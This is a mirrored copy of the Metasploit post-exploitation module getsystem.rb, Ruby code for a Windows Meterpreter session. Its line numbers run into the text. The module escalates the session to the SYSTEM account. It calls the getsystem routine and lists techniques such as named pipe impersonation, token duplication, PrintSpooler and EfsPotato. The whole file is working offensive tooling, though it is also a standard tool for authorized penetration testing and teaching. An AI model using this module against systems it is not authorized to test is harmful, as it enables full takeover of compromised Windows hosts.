CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/escalate/getsystem.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasm'67class MetasploitModule < Msf::Post8include Msf::Post::Windows::Priv910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Windows Escalation',15'Description' => %q{16This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various17techniques.18},19'License' => MSF_LICENSE,20'Author' => 'hdm',21'Platform' => [ 'win' ],22'SessionTypes' => [ 'meterpreter' ],23'Compat' => {24'Meterpreter' => {25'Commands' => %w[26priv_elevate_getsystem27]28}29},30'Notes' => {31'AKA' => [32'Named Pipe Impersonation',33'Token Duplication',34'RPCSS',35'PrintSpooler',36'EFSRPC',37'EfsPotato'38]39}40)41)4243register_options([44OptInt.new('TECHNIQUE', [false, 'Specify a particular technique to use (1-6), otherwise try them all', 0])45])46end4748def unsupported49print_error('This platform is not supported with this script!')50raise Rex::Script::Completed51end5253def run54technique = datastore['TECHNIQUE'].to_i5556unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)5758if is_system?59print_good('This session already has SYSTEM privileges')60return61end6263begin64result = client.priv.getsystem(technique)65print_good("Obtained SYSTEM via technique #{result[1]}")66rescue Rex::Post::Meterpreter::RequestError => e67print_error('Failed to obtain SYSTEM access')68end69end70end717273